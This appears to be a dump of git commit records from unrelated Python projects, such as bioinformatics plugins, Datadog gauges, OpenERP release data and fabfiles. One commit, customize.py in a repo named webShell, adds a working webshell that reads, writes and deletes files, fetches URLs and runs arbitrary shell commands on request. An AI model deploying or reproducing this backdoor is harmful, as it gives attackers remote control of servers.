# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from numpy import reshape, zeros
class MCMC(object):
def __init__(self, data, strategy):
self.data = data
self.strategy = strategy
self.simulations = None
def summary(self):
smry = ""
return smry
def define_parameters(self):
return self.strategy.define_parameters()
def initial_value(self,parameter_name):
return self.strategy.initial_value(parameter_name)
def distribution_parameters(self, parameter_name):
return self.strategy.distribution_parameters(parameter_name) # returns a dictionary
def generate(self, parameter_name):
return self.strategy.generate(parameter_name)
def output(self, burn, parameter_name):
return self.strategy.output(self.simulations, burn, parameter_name)
def run(self, number_simulations=100):
self.simulations = {key : zeros((param.size[0],param.size[1],number_simulations)) for (key, param) in self.strategy.parameters.list.items()}
for name in self.strategy.parameters.hierarchy:
self.strategy.parameters.list[name].current_value = self.initial_value(name)
for i in range(number_simulations):
print("== step %i ==" % (int(i+1),))
#restart_step = True
#while restart_step:
for name in self.strategy.parameters.hierarchy:
print("== parameter %s ==" % name)
#try:
self.strategy.parameters.list[name].current_value = self.generate(name)
self.simulations[name][:,:,i] = self.strategy.parameters.list[name].current_value.reshape(self.strategy.parameters.list[name].size)
#restart_step = False
#except:
# print("== restart step %i ==" % i)
# restart_step = True
# break
| mit | Python |
e5bd79a2cb80c18662a85b0fcb63b7dd8812a9ea | set var collection name on connection api | chrisdamba/mining,mining/mining,avelino/mining,seagoat/mining,mlgruby/mining,AndrzejR/mining,jgabriellima/mining,mlgruby/mining,chrisdamba/mining,avelino/mining,seagoat/mining,mining/mining,mlgruby/mining,AndrzejR/mining,jgabriellima/mining | controllers/api/connection.py | controllers/api/connection.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from bottle import Bottle
from bottle.ext.mongo import MongoPlugin
from .base import get, post, put, delete
ADMIN_BUCKET_NAME = 'openminig-admin'
collection = 'connection'
connection_app = Bottle()
mongo = MongoPlugin(uri="mongodb://127.0.0.1", db=ADMIN_BUCKET_NAME,
json_mongo=True)
connection_app.install(mongo)
@connection_app.route('/', method='GET')
@connection_app.route('/:slug', method='GET')
def connection_get(mongodb, slug=None):
return get(mongodb, collection, slug)
@connection_app.route('/', method='POST')
def connection_post(mongodb, slug=None):
return post(mongodb, collection)
@connection_app.route('/:slug', method='PUT')
def connection_put(mongodb, slug=None):
return put(mongodb, collection, slug)
@connection_app.route('/:slug', method='DELETE')
def connection_delete(mongodb, slug=None):
return delete(mongodb, collection, slug)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
from bottle import Bottle
from bottle.ext.mongo import MongoPlugin
from .base import get, post, put, delete
ADMIN_BUCKET_NAME = 'openminig-admin'
connection_app = Bottle()
mongo = MongoPlugin(uri="mongodb://127.0.0.1", db=ADMIN_BUCKET_NAME,
json_mongo=True)
connection_app.install(mongo)
@connection_app.route('/', method='GET')
@connection_app.route('/:slug', method='GET')
def connection_get(mongodb, slug=None):
return get(mongodb, 'connection', slug)
@connection_app.route('/', method='POST')
def connection_post(mongodb, slug=None):
return post(mongodb, 'connection')
@connection_app.route('/:slug', method='PUT')
def connection_put(mongodb, slug=None):
return put(mongodb, 'connection', slug)
@connection_app.route('/:slug', method='DELETE')
def connection_delete(mongodb, slug=None):
return delete(mongodb, 'connection', slug)
| mit | Python |
81e0a52f40d2a706ff5f7a347af48637f1b439f6 | revert _case_blocks functionality in reportxform pillow | qedsoftware/commcare-hq,dimagi/commcare-hq,SEL-Columbia/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,puttarajubr/commcare-hq,gmimano/commcaretest,puttarajubr/commcare-hq,qedsoftware/commcare-hq,puttarajubr/commcare-hq,qedsoftware/commcare-hq,qedsoftware/commcare-hq,puttarajubr/commcare-hq,dimagi/commcare-hq,SEL-Columbia/commcare-hq,gmimano/commcaretest,gmimano/commcaretest,dimagi/commcare-hq,SEL-Columbia/commcare-hq,qedsoftware/commcare-hq | corehq/pillows/reportxform.py | corehq/pillows/reportxform.py | import copy
from django.conf import settings
from casexml.apps.case.xform import extract_case_blocks
from corehq.pillows.base import convert_property_dict
from .mappings.reportxform_mapping import REPORT_XFORM_INDEX, REPORT_XFORM_MAPPING
from .xform import XFormPillow
COMPUTED_CASEBLOCKS_KEY = '_case_blocks'
class ReportXFormPillow(XFormPillow):
"""
an extension to XFormPillow that provides for indexing of arbitrary data fields
within the xform
"""
es_index_prefix = "report_xforms"
es_alias = "report_xforms"
es_type = "report_xform"
es_index = REPORT_XFORM_INDEX
#type level mapping
default_mapping = REPORT_XFORM_MAPPING
def change_transform(self, doc_dict):
doc_ret = super(ReportXFormPillow, self).change_transform(doc_dict)
if doc_ret:
domain = self.get_domain(doc_dict)
if domain not in getattr(settings, 'ES_XFORM_FULL_INDEX_DOMAINS', []):
#full indexing is only enabled for select domains on an opt-in basis
return None
convert_property_dict(doc_ret['form'], self.default_mapping['properties']['form'], override_root_keys=['case'])
return doc_ret
else:
return None
| from django.conf import settings
from corehq.pillows.base import convert_property_dict
from .mappings.reportxform_mapping import REPORT_XFORM_INDEX, REPORT_XFORM_MAPPING
from .xform import XFormPillow
class ReportXFormPillow(XFormPillow):
"""
an extension to XFormPillow that provides for indexing of arbitrary data fields
within the xform
"""
es_index_prefix = "report_xforms"
es_alias = "report_xforms"
es_type = "report_xform"
es_index = REPORT_XFORM_INDEX
#type level mapping
default_mapping = REPORT_XFORM_MAPPING
def change_transform(self, doc_dict):
doc_ret = super(ReportXFormPillow, self).change_transform(doc_dict)
if doc_ret:
domain = self.get_domain(doc_dict)
if domain not in getattr(settings, 'ES_XFORM_FULL_INDEX_DOMAINS', []):
#full indexing is only enabled for select domains on an opt-in basis
return None
#after basic transforms for stupid type mistakes are done, walk all properties.
convert_property_dict(doc_ret['form'], self.default_mapping['properties']['form'], override_root_keys=['case'])
return doc_ret
else:
return None
| bsd-3-clause | Python |
16eeb4ea9bda060389dac5c52903a7a8804c690b | add docstrings | dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq | corehq/util/datadog/gauges.py | corehq/util/datadog/gauges.py | from functools import wraps
from celery.task import periodic_task
from corehq.util.datadog import statsd, datadog_logger
from corehq.util.soft_assert import soft_assert
def datadog_gauge_task(name, fn, run_every, enforce_prefix='commcare'):
"""
helper for easily registering datadog gauges to run periodically
To update a datadog gauge on a schedule based on the result of a function
just add to your app's tasks.py:
my_calculation = datadog_gauge_task('my.datadog.metric', my_calculation_function,
run_every=crontab(minute=0))
"""
_enforce_prefix(name, enforce_prefix)
datadog_gauge = _DatadogGauge(name, fn, run_every)
return datadog_gauge.periodic_task()
def datadog_histogram(name, value, enforce_prefix='commcare', tags=None):
"""
Usage: Used to track the statistical distribution of a set of values over a statsd flush period.
Actually submits as multiple metrics:
"""
_datadog_record(statsd.histogram, name, value, enforce_prefix, tags)
def datadog_gauge(name, value, enforce_prefix='commcare', tags=None):
"""
Stored as a GAUGE type in the datadog web application. Each value in the stored timeseries
is the last gauge value submitted for that metric during the statsd flush period.
"""
_datadog_record(statsd.gauge, name, value, enforce_prefix, tags)
def datadog_counter(name, value=1, enforce_prefix='commcare', tags=None):
"""
Usage: Used to increment a counter of events.
Stored as a RATE type in the datadog web application. Each value in the stored timeseries
is a time-normalized delta of the counter's value over that statsd flush period.
"""
_datadog_record(statsd.increment, name, value, enforce_prefix, tags)
def _datadog_record(fn, name, value, enforce_prefix='commcare', tags=None):
_enforce_prefix(name, enforce_prefix)
try:
fn(name, value, tags=tags)
except Exception:
datadog_logger.exception('Unable to record Datadog stats')
class _DatadogGauge(object):
def __init__(self, name, fn, run_every):
self.name = name
self.fn = fn
self.run_every = run_every
def periodic_task(self):
@periodic_task('background_queue', run_every=self.run_every,
acks_late=True, ignore_result=True)
@wraps(self.fn)
def inner(*args, **kwargs):
statsd.gauge(self.name, self.fn(*args, **kwargs))
return inner
def _enforce_prefix(name, prefix):
soft_assert(fail_if_debug=True).call(
not prefix or name.split('.')[0] == prefix,
"Did you mean to call your gauge 'commcare.{}'? "
"If you're sure you want to forgo the prefix, you can "
"pass enforce_prefix=None".format(name))
| from functools import wraps
from celery.task import periodic_task
from corehq.util.datadog import statsd, datadog_logger
from corehq.util.soft_assert import soft_assert
def datadog_gauge_task(name, fn, run_every, enforce_prefix='commcare'):
"""
helper for easily registering datadog gauges to run periodically
To update a datadog gauge on a schedule based on the result of a function
just add to your app's tasks.py:
my_calculation = datadog_gauge_task('my.datadog.metric', my_calculation_function,
run_every=crontab(minute=0))
"""
_enforce_prefix(name, enforce_prefix)
datadog_gauge = _DatadogGauge(name, fn, run_every)
return datadog_gauge.periodic_task()
def datadog_histogram(name, value, enforce_prefix='commcare', tags=None):
"""
Usage: Used to track the statistical distribution of a set of values over a statsd flush period.
Actually submits as multiple metrics:
"""
_datadog_record(statsd.histogram, name, value, enforce_prefix, tags)
def datadog_gauge(name, value, enforce_prefix='commcare', tags=None):
_datadog_record(statsd.gauge, name, value, enforce_prefix, tags)
def datadog_counter(name, value=1, enforce_prefix='commcare', tags=None):
_datadog_record(statsd.increment, name, value, enforce_prefix, tags)
def _datadog_record(fn, name, value, enforce_prefix='commcare', tags=None):
_enforce_prefix(name, enforce_prefix)
try:
fn(name, value, tags=tags)
except Exception:
datadog_logger.exception('Unable to record Datadog stats')
class _DatadogGauge(object):
def __init__(self, name, fn, run_every):
self.name = name
self.fn = fn
self.run_every = run_every
def periodic_task(self):
@periodic_task('background_queue', run_every=self.run_every,
acks_late=True, ignore_result=True)
@wraps(self.fn)
def inner(*args, **kwargs):
statsd.gauge(self.name, self.fn(*args, **kwargs))
return inner
def _enforce_prefix(name, prefix):
soft_assert(fail_if_debug=True).call(
not prefix or name.split('.')[0] == prefix,
"Did you mean to call your gauge 'commcare.{}'? "
"If you're sure you want to forgo the prefix, you can "
"pass enforce_prefix=None".format(name))
| bsd-3-clause | Python |
547f92524913f4d01094ff000ba3e3fe9d7b68a8 | Update customize.py | ayiis/webShell,ayiis/webShell | customize/python/customize.py | customize/python/customize.py | # -*- coding:utf-8 -*-
import urllib
import os
import shutil
import time
import datetime
def getDirInfo(path):
ret = {
'f': [],
'd': [],
}
pList = os.listdir(path)
for p in pList:
pp = path + p
mtime = time.localtime(os.stat(pp).st_mtime)
mtime = time.strftime('%Y-%m-%d %H:%M:%S', mtime)
if os.path.isfile(pp):
ret['f'].append(p + '\t' + mtime + '\t' + str(os.path.getsize(pp)) + '\t-\n')
else:
ret['d'].append(p + '/\t' + mtime + '\t0\t-\n')
return ret
def main(req):
Z = req['z']
encoding = req['z0']
Z1 = req['z1']
Z2 = req['z2']
Ret = '1'
if Z == 'A':
disk_list = list('abcdefghijklmnopqrstuvwxyz')
exist_disk = ':'.join(filter(lambda x: os.path.isdir(x + ':'), disk_list)) + ':'
return os.getcwd() + '\t' + exist_disk
elif Z == 'B':
Ret = ''
dirinfo = getDirInfo(Z1)
if len(dirinfo['d']) > 0:
dirinfo['d'].sort(lambda a, b: 1 if a.upper() > b.upper() else -1)
Ret += ''.join(dirinfo['d'])
if len(dirinfo['f']) > 0:
dirinfo['f'].sort(lambda a, b: 1 if a.upper() > b.upper() else -1)
Ret += ''.join(dirinfo['f'])
elif Z == 'C':
fileHandle = open(Z1)
Ret = fileHandle.read()
fileHandle.close()
elif Z == 'D':
fileHandle = open(Z1, 'w')
fileHandle.write(Z2)
fileHandle.close()
elif Z == 'E':
if os.path.isfile(Z1):
os.remove(Z1)
else:
shutil.rmtree(Z1)
elif Z == 'F':
fileHandle = open(Z1, 'rb')
Ret = fileHandle.read()
fileHandle.close()
elif Z == 'G':
fileHandle = open(Z1, 'wb')
fileHandle.write(Z2.decode('hex'))
fileHandle.close()
elif Z == 'H':
shutil.copyfile(Z1, Z2)
elif Z == 'I':
dirname = Z1[:Z1.rfind('\\') + 1]
os.chdir(dirname) # change working dir
os.rename(Z1[Z1.rfind('\\') + 1:], Z2[Z2.rfind('\\') + 1:])
elif Z == 'J':
if os.path.exists(Z1) == False:
os.mkdir(Z1)
elif Z == 'K':
TM = datetime.datetime.strptime(Z2, '%Y-%m-%d %H:%M:%S')
TM = time.mktime(TM.timetuple())
os.utime(Z1, (TM, TM))
elif Z == 'L':
urllib.urlretrieve(Z1, Z2)
elif Z == 'M':
os.popen('chcp 437 >nul&chcp 65001 >nul')
cmd = ' '.join([Z1[2:], Z1[0:2], Z2])
Ret = os.popen(cmd).read()
os.popen('chcp 437')
return Ret
def do(req):
ret = main(req)
ret = '\x2D\x3E\x7C' + str(ret or 1) + '\x7C\x3C\x2D'
return ret
#
# TEST #
#
from flask import request
app.add_url_rule('/customize', 'customize', routes.customize.api, methods=['POST'])
def api():
req_data = {
'z': request.form.get('z'),
'z0': request.form.get('z0'),
'z1': request.form.get('z1'),
'z2': request.form.get('z2'),
}
return do(req_data)
| #
| mit | Python |
2d42e22a2fc6873821d61a63b14c66ff0a9fed3e | Remove test code. | wireservice/agate,onyxfish/agate,JoeGermuska/agate,onyxfish/journalism,flother/agate | example.py | example.py | #!/usr/bin/env python
import agate
tester = agate.TypeTester(force={
'fips': agate.Text()
})
table = agate.Table.from_csv('examples/realdata/ks_1033_data.csv', column_types=tester)
# Question 1: What was the total cost to Kansas City area counties?
# Filter to counties containing Kansas City
kansas_city = table.where(lambda r: r['county'] in ('JACKSON', 'CLAY', 'CASS', 'PLATTE'))
# Sum total_cost of four counties
print('Total for Kansas City area: %i' % kansas_city.aggregate(agate.Sum('total_cost')))
# Question 2: Which counties spent the most?
# Group by counties
counties = table.group_by('county')
# Aggregate totals for all counties
totals = counties.aggregate([
('total_cost_sum', agate.Sum('total_cost'))
])
totals = totals.order_by('total_cost_sum', reverse=True)
totals.limit(20).print_bars('county', 'total_cost_sum', width=80)
print('Five most spendy counties:')
totals.print_table(5)
# Question 3: What are the most recent purchases?
recent = table.order_by('ship_date', reverse=True)
print('Five most recent purchases:')
recent.print_table(5, 5)
# Question 4: What is the standard of deviation of the cost of all purchases?
stdev = table.aggregate(agate.StDev('total_cost'))
print('Standard deviation of total_cost: %.2f' % stdev)
# Question 5: How many robots were purchased?
robots = table.where(lambda r: 'ROBOT' in (r['item_name'] or [])).aggregate(agate.Sum('quantity'))
print('Number of robots purchased: %i' % robots)
| #!/usr/bin/env python
import agate
tester = agate.TypeTester(force={
'fips': agate.Text()
})
table = agate.Table.from_csv('examples/realdata/ks_1033_data.csv', column_types=tester)
a = table.pivot('county', computation=agate.Percent('pivot'))
a.print_table(max_rows=10)
import sys
sys.exit()
# Question 1: What was the total cost to Kansas City area counties?
# Filter to counties containing Kansas City
kansas_city = table.where(lambda r: r['county'] in ('JACKSON', 'CLAY', 'CASS', 'PLATTE'))
# Sum total_cost of four counties
print('Total for Kansas City area: %i' % kansas_city.aggregate(agate.Sum('total_cost')))
# Question 2: Which counties spent the most?
# Group by counties
counties = table.group_by('county')
# Aggregate totals for all counties
totals = counties.aggregate([
('total_cost_sum', agate.Sum('total_cost'))
])
totals = totals.order_by('total_cost_sum', reverse=True)
totals.limit(20).print_bars('county', 'total_cost_sum', width=80)
print('Five most spendy counties:')
totals.print_table(5)
# Question 3: What are the most recent purchases?
recent = table.order_by('ship_date', reverse=True)
print('Five most recent purchases:')
recent.print_table(5, 5)
# Question 4: What is the standard of deviation of the cost of all purchases?
stdev = table.aggregate(agate.StDev('total_cost'))
print('Standard deviation of total_cost: %.2f' % stdev)
# Question 5: How many robots were purchased?
robots = table.where(lambda r: 'ROBOT' in (r['item_name'] or [])).aggregate(agate.Sum('quantity'))
print('Number of robots purchased: %i' % robots)
| mit | Python |
4b5147ca4659ced9173033c5d1b9b09aa173073b | fix example.py | ashbc/pybreak | example.py | example.py | from cards import Ice, Breaker
# Example implementation for funky cards
# Subclassing would be better and would allow for grouping of similar effects
# (eg breakers that break "up to X" subroutines rather than exactly X
# (which actually turns out to be the case for most multi-sub breakers).
# this has a certain interaction with so-called "optional" subroutines.)
# another, better, simpler, example might be advanceable ice :P
# http://i.imgur.com/vxB2kXD.png
icet = Ice()
icet.subtype = ('Barrier', 'Tracer')
icet.name = 'Ice-T'
# rather than subclass and add an "advancements" field here's a hack
icet_advancements = 0
# X strength
icet.strength = lambda *args: icet_advancements
# X rez cost
icet.rez_cost = lambda *args: icet_advancements
# X subroutines (with trace x)
icet.subroutine_count = lambda *args: icet_advancements
# note that these *args are a lazy way of circumventing the expected format,
# because we don't care about anything except this hack variable.
# The correct form would be lambda self, breaker
bread = Breaker()
bread.name = "Gingerbread"
bread.subtype = ('Icebreaker')
bread.target_subtype = ('Tracer')
bread.boost_cost = 2
bread.boost_amount = 3
bread.break_cost = 1
bread.break_amount = 1
bread.strength = 2
while icet_advancements < 7:
icet_advancements += 1
print("Gingerbread breaks a {}-advanced Ice-T for {} credits.".format(icet_advancements, bread.break_ice(icet)))
|
# Example implementation for funky cards
# Subclassing would be better and would allow for grouping of similar effects
# (eg breakers that break "up to X" subroutines rather than exactly X
# (which actually turns out to be the case for most multi-sub breakers).
# this has a certain interaction with so-called "optional" subroutines.)
# another, better, simpler, example might be advanceable ice :P
# http://i.imgur.com/vxB2kXD.png
icet = Ice()
icet.subtype = ('Barrier', 'Tracer')
icet.name = 'Ice-T'
# rather than subclass and add an "advancements" field here's a hack
icet_advancements = 4
# X strength
icet.strength = lambda *args: icet_advancements
# X rez cost
icet.rez_cost = lambda *args: icet_advancements
# X subroutines (with trace x)
icet.subroutine_count = lambda *args: icet_advancements
# note that these *args are a lazy way of circumventing the expected format,
# because we don't care about anything except this hack variable.
# The correct form would be lambda self, breaker
bread = Breaker()
bread.name = "Gingerbread"
bread.subtype = ('Icebreaker')
bread.target_subtype = ('Tracer')
bread.boost_cost = 2
bread.boost_amount = 3
bread.break_cost = 1
bread.break_amount = 1
bread.strength = 2
print(
"Gingerbread breaks a {}-advanced Ice-T for {} credits.".format(
icet_advancements, bread.break_ice(icet)))
| isc | Python |
a74e91613be376d6d71fb90c15cab689af661e37 | Add __getattr__ method in order to be able to call non-defined methods | mdsrosa/money-conversion-py | money_conversion/money.py | money_conversion/money.py | from currency_rates import rates
class Money(object):
def __init__(self, amount, currency):
self.amount = amount
self.currency = currency.upper()
def __repr__(self):
return "%.2f %s" % (self.amount, self.currency)
def __getattr__(self, currency):
def convert():
return self.to_currency(currency)
return convert
def to_currency(self, currency):
currency = currency.split('_')[1].upper()
amount = self.amount
base_currency_rates = rates.get(self.currency)
new_amount = amount * base_currency_rates.get(currency)
return Money(new_amount, currency)
| from currency_rates import rates
class Money(object):
def __init__(self, amount, currency):
self.amount = amount
self.currency = currency.upper()
def __repr__(self):
return "%.2f %s" % (self.amount, self.currency)
def to_currency(self, new_currency):
new_currency = new_currency.split('_')[1].upper()
amount = self.amount
base_currency_rates = rates.get(self.currency)
new_amount = amount * base_currency_rates.get(new_currency)
return Money(new_amount, new_currency)
| mit | Python |
67afd6a7808e2d63809d08537d733c1fe740918b | Change the description | vnc-biz/openerp-server,xrg/openerp-server,MarkusTeufelberger/openobject-server,gisce/openobject-server,gisce/openobject-server,gisce/openobject-server,ovnicraft/openerp-server,MarkusTeufelberger/openobject-server,MarkusTeufelberger/openobject-server,xrg/openerp-server,splbio/openobject-server,splbio/openobject-server,ovnicraft/openerp-server,splbio/openobject-server,vnc-biz/openerp-server | bin/release.py | bin/release.py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2008 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
name = 'openerp-server'
version = '5.0.0_rc2'
major_version = '5.0'
description = 'OpenERP Server'
long_desc = '''\
OpenERP is a complete ERP and CRM. The main features are accounting (analytic
and financial), stock management, sales and purchases management, tasks
automation, marketing campaigns, help desk, POS, etc. Technical features include
a distributed server, flexible workflows, an object database, a dynamic GUI,
customizable reports, and XML-RPC interfaces.
'''
classifiers = """\
Development Status :: 5 - Production/Stable
License :: OSI Approved :: GNU General Public License Version 3 (GPL-3)
Programming Language :: Python
"""
url = 'http://www.openerp.com'
author = 'Tiny.be'
author_email = 'info@tiny.be'
support_email = 'support@openerp.com'
license = 'GPL-3'
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| #!/usr/bin/env python
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2008 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
name = 'openerp-server'
version = '5.0.0_rc2'
major_version = '5.0'
description = 'OpenERP Server'
long_desc = '''\
OpenERP is a complete ERP and CRM. The main features are accounting (analytic
and financial), stock management, sales and purchases management, tasks
automation, marketing campaigns, help desk, POS, etc. Technical features include
a distributed server, flexible workflows, an object database, a dynamic GUI,
customizable reports, and SOAP and XML-RPC interfaces.
'''
classifiers = """\
Development Status :: 5 - Production/Stable
License :: OSI Approved :: GNU General Public License Version 3 (GPL-3)
Programming Language :: Python
"""
url = 'http://www.openerp.com'
author = 'Tiny.be'
author_email = 'info@tiny.be'
support_email = 'support@openerp.com'
license = 'GPL-3'
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | Python |
20b757c31564be88a4e574661af72cbf57487858 | remove reference to celery in fabric file | Lancey6/woodwind,Lancey6/woodwind | fabfile.py | fabfile.py | from fabric.api import local, prefix, cd, run, env, lcd, sudo
env.hosts = ['orin.kylewm.com']
REMOTE_PATH = '/srv/www/kylewm.com/woodwind'
def commit():
local("git add -p")
local("git diff-index --quiet HEAD || git commit")
def push():
local("git push origin master")
def pull():
with cd(REMOTE_PATH):
run("git pull origin master")
run("git submodule update")
def push_remote():
with cd(REMOTE_PATH):
run("git add -p")
run("git diff-index --quiet HEAD || git commit")
run("git push origin master")
def restart():
with cd(REMOTE_PATH):
with prefix("source venv/bin/activate"):
run("pip install --upgrade -r requirements.txt")
sudo("restart woodwind")
sudo("restart woodwind-tornado")
def deploy():
commit()
push()
pull()
restart()
| from fabric.api import local, prefix, cd, run, env, lcd, sudo
env.hosts = ['orin.kylewm.com']
REMOTE_PATH = '/srv/www/kylewm.com/woodwind'
def commit():
local("git add -p")
local("git diff-index --quiet HEAD || git commit")
def push():
local("git push origin master")
def pull():
with cd(REMOTE_PATH):
run("git pull origin master")
run("git submodule update")
def push_remote():
with cd(REMOTE_PATH):
run("git add -p")
run("git diff-index --quiet HEAD || git commit")
run("git push origin master")
def restart():
with cd(REMOTE_PATH):
with prefix("source venv/bin/activate"):
run("pip install --upgrade -r requirements.txt")
sudo("restart woodwind")
sudo("restart woodwind-celery")
sudo("restart woodwind-tornado")
def deploy():
commit()
push()
pull()
restart()
| bsd-2-clause | Python |
9d8e5daf88affc2d766229602067a478f105b496 | add missing import | renalreg/radar-client,renalreg/radar-client,renalreg/radar-client | fabfile.py | fabfile.py | import binascii
import os
import re
from pkg_resources import parse_version
from fabric.api import task, put, run, cd
@task
def deploy(archive=None, name='radar-client'):
if archive is None:
archive = sorted(filter(lambda x: x.endswith('.tar.gz'), os.listdir('.')), key=parse_version)[-1]
version = re.search('-([^-]+)\.tar\.gz$', archive).group(1)
current_version = '/srv/{name}/current'.format(name=name)
new_version = '/srv/{name}/{version}'.format(name=name, version=version)
randomstr = binascii.hexlify(os.urandom(20)).decode('utf-8')
tmp = '/tmp/radar-client-{0}'.format(randomstr)
run('mkdir {0}'.format(tmp))
remote_archive = '{0}/radar-client.tar.gz'.format(tmp)
put(archive, remote_archive)
run('rm -rf {0} && mkdir -p {0}'.format(new_version))
with cd(new_version):
run('tar --strip-components=1 -xzf {}'.format(remote_archive))
run('ln -sfn {0} {1}'.format(new_version, current_version))
run('rm -rf {0}'.format(tmp))
| import os
import re
from pkg_resources import parse_version
from fabric.api import task, put, run, cd
@task
def deploy(archive=None, name='radar-client'):
if archive is None:
archive = sorted(filter(lambda x: x.endswith('.tar.gz'), os.listdir('.')), key=parse_version)[-1]
version = re.search('-([^-]+)\.tar\.gz$', archive).group(1)
current_version = '/srv/{name}/current'.format(name=name)
new_version = '/srv/{name}/{version}'.format(name=name, version=version)
randomstr = binascii.hexlify(os.urandom(20)).decode('utf-8')
tmp = '/tmp/radar-client-{0}'.format(randomstr)
run('mkdir {0}'.format(tmp))
remote_archive = '{0}/radar-client.tar.gz'.format(tmp)
put(archive, remote_archive)
run('rm -rf {0} && mkdir -p {0}'.format(new_version))
with cd(new_version):
run('tar --strip-components=1 -xzf {}'.format(remote_archive))
run('ln -sfn {0} {1}'.format(new_version, current_version))
run('rm -rf {0}'.format(tmp))
| agpl-3.0 | Python |
0d9c81996e436f5f717801e8abdd6c12e9c39084 | Update fabfile | explosion/thinc,explosion/thinc,explosion/thinc,spacy-io/thinc,explosion/thinc,spacy-io/thinc,spacy-io/thinc | fabfile.py | fabfile.py | from fabric.api import task, local, run, lcd, cd, env
from os.path import exists as file_exists
from fabtools.python import virtualenv
from os import path
PWD = path.dirname(__file__)
VENV_DIR = path.join(PWD, '.env')
#def dev():
# # Allow this to persist, since we aren't as rigorous about keeping state clean
# if not file_exists('.denv'):
# local('virtualenv .denv')
#
# with virtualenv(DEV_ENV_DIR):
# local('pip install -r requirements.txt')
@task
def sdist():
if file_exists('dist/'):
local('rm -rf dist/')
local('mkdir dist')
with virtualenv(VENV_DIR):
local('python setup.py sdist')
@task
def publish(version):
with virtualenv(VENV_DIR):
local('git push origin master')
local('git tag -a %s' % version)
local('git push origin %s' % version)
local('python setup.py sdist')
local('python setup.py register')
local('twine upload dist/*.tar.gz')
@task
def env():
if file_exists('.env'):
local('rm -rf .env')
local('virtualenv .env')
local('pip install -r requirements.txt')
@task
def install():
with virtualenv(VENV_DIR):
local('pip install --upgrade setuptools')
local('pip install dist/*.tar.gz')
local('pip install pytest')
@task
def make():
with virtualenv(VENV_DIR):
with lcd(path.dirname(__file__)):
local('python setup.py build_ext --inplace')
@task
def clean():
with lcd(path.dirname(__file__)):
local('python setup.py clean --all')
@task
def test():
with virtualenv(VENV_DIR):
with lcd(path.dirname(__file__)):
local('python -m pytest -x thinc')
| from fabric.api import local, run, lcd, cd, env
from os.path import exists as file_exists
from fabtools.python import virtualenv
from os import path
PWD = path.dirname(__file__)
VENV_DIR = path.join(PWD, '.env')
DEV_ENV_DIR = path.join(PWD, '.denv')
def dev():
# Allow this to persist, since we aren't as rigorous about keeping state clean
if not file_exists('.denv'):
local('virtualenv .denv')
with virtualenv(DEV_ENV_DIR):
local('pip install -r requirements.txt')
def sdist():
if file_exists('dist/'):
local('rm -rf dist/')
local('mkdir dist')
with virtualenv(VENV_DIR):
local('python setup.py sdist')
def publish(version):
with virtualenv(VENV_DIR):
local('git push origin master')
local('git tag -a %s' % version)
local('git push origin %s' % version)
local('python setup.py sdist')
local('python setup.py register')
local('twine upload dist/*.tar.gz')
def setup():
if file_exists('.env'):
local('rm -rf .env')
local('virtualenv .env')
def install():
with virtualenv(VENV_DIR):
local('pip install --upgrade setuptools')
local('pip install dist/*.tar.gz')
local('pip install pytest')
def make():
with virtualenv(VENV_DIR):
with lcd(path.dirname(__file__)):
local('python setup.py build_ext --inplace')
def clean():
with lcd(path.dirname(__file__)):
local('python setup.py clean --all')
def test():
with virtualenv(VENV_DIR):
with lcd(path.dirname(__file__)):
local('python -m pytest -x thinc')
def travis():
local('open https://travis-ci.org/spacy-io/thinc')
| mit | Python |
34e7b2503f2dbd99e0a61e9fc2fa6cac8a3a69e8 | Hide qualimap's median coverage (avg. cov is reported by bcbio) | vladsaveliev/MultiQC_bcbio,MultiQC/MultiQC_bcbio,lpantano/MultiQC_bcbio | multiqc_bcbio/__init__.py | multiqc_bcbio/__init__.py | from __future__ import absolute_import
from .bcbio import MultiqcModule
from multiqc import config
# Add search patterns and config options for the things that are used in MultiQC_bcbio
def multiqc_bcbio_config():
    """ Set up MultiQC config defaults for this package """
    # File-name / content patterns MultiQC uses to discover the various
    # bcbio output files in the analysis directory.
    bcbio_search_patterns = {
        'bcbio/metrics': {'fn': '*_bcbio.txt'},
        'bcbio/coverage': {'fn': '*_bcbio_coverage.txt'},
        'bcbio/coverage_avg': {'fn': '*_bcbio_coverage_avg.txt'},
        'bcbio/variants': {'fn': '*_bcbio_variants.txt'},
        'bcbio/target': {'fn': 'target_info.yaml'},
        'bcbio/qsignature': {'fn': '*bcbio_qsignature.ma'},
        'bcbio/vcfstats': {'fn': '*_bcbio_variants_stats.txt'},
        'bcbio/seqbuster': {'contents': 'seqbuster'},
        'bcbio/umi': {'fn': '*_umi_stats.yaml'},
        'bcbio/viral': {'fn': '*viral*-counts.txt'},
